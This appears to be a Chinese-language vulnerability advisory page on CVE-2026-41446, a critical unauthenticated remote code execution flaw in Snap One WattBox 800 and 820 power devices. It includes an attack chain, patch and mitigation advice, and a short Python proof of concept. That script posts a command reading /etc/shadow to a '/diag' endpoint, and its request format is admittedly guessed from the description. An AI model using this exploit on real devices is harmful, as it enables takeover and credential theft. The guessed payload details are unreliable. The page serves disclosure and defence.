IPBUF安全漏洞报告
English
CVE-2026-41446 CVSS 9.8 严重

CVE-2026-41446 Snap One WattBox远程代码执行漏洞

披露日期: 2026-04-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41446
漏洞类型
远程代码执行 (RCE)
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Snap One WattBox 800 and 820 series

相关标签

RCE远程代码执行硬编码凭证IoTSnap OneWattBoxCritical

漏洞概述

Snap One WattBox 800和820系列设备在2.10.0.0版本之前的固件中存在严重安全漏洞。由于固件包含未公开的诊断HTTP端点,且仅依赖设备物理标签上明文打印的MAC地址和服务标签进行身份验证,攻击者一旦获取这些物理信息,即可绕过认证机制。这允许攻击者向受影响端点发送恶意请求,进而以root权限在设备上执行任意命令,完全接管设备控制权。

技术细节

该漏洞源于Snap One WattBox设备固件中未公开的诊断HTTP端点认证机制存在严重设计缺陷。系统未采用强密码或加密密钥进行保护,而是错误地仅依赖于设备物理标签上明文打印的MAC地址和服务标签作为唯一的认证凭证。攻击者在获得对设备物理标签的访问权或通过文档泄露获取上述信息后,可构造包含特定参数的恶意HTTP请求发送至诊断接口。由于服务端缺乏有效的二次验证机制,攻击者能够轻易绕过身份认证,利用该接口注入并执行任意系统命令。这将导致攻击者获得设备的最高root权限,从而完全控制设备,造成严重的数据泄露、服务中断或被植入后门等后果。

攻击链分析

STEP 1
信息收集
攻击者物理接触设备或获取设备文档,记录设备标签上明文显示的MAC地址和服务标签。
STEP 2
漏洞利用
攻击者向设备的未公开诊断HTTP端点发送包含获取到的MAC地址和服务标签的请求。
STEP 3
命令执行
由于认证机制仅依赖这些明文信息,攻击者成功绕过认证,并以root权限在设备上执行任意系统命令。
STEP 4
控制设备
攻击者获得设备的完全控制权,可以进一步窃取数据、破坏服务或建立持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: Snap One WattBox Unauthenticated RCE PoC # CVE: CVE-2026-41446 # Description: Uses MAC and Service Tag from device label to execute commands. target_url = "http://<DEVICE_IP>/diag" mac_address = "<MAC_ADDRESS_FROM_LABEL>" # e.g., 00:11:22:33:44:55 service_tag = "<SERVICE_TAG_FROM_LABEL>" # e.g., 123456 command = "cat /etc/shadow" # Arbitrary command to execute as root # Payload structure based on vulnerability description payload = { "mac": mac_address, "service_tag": service_tag, "cmd": command } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Command executed successfully!") print("[+] Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Snap One WattBox 800 series < 2.10.0.0
Snap One WattBox 820 series < 2.10.0.0

防御指南

临时缓解措施
建议立即将受影响的Snap One WattBox设备固件升级至2.10.0.0或更高版本以修复此漏洞。如果无法立即升级,应将设备置于隔离网络中,并严格限制对设备管理端口(通常是HTTP/HTTPS端口)的入站访问,仅允许受信任的IP地址连接,同时确保设备物理安全,避免泄露标签信息。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表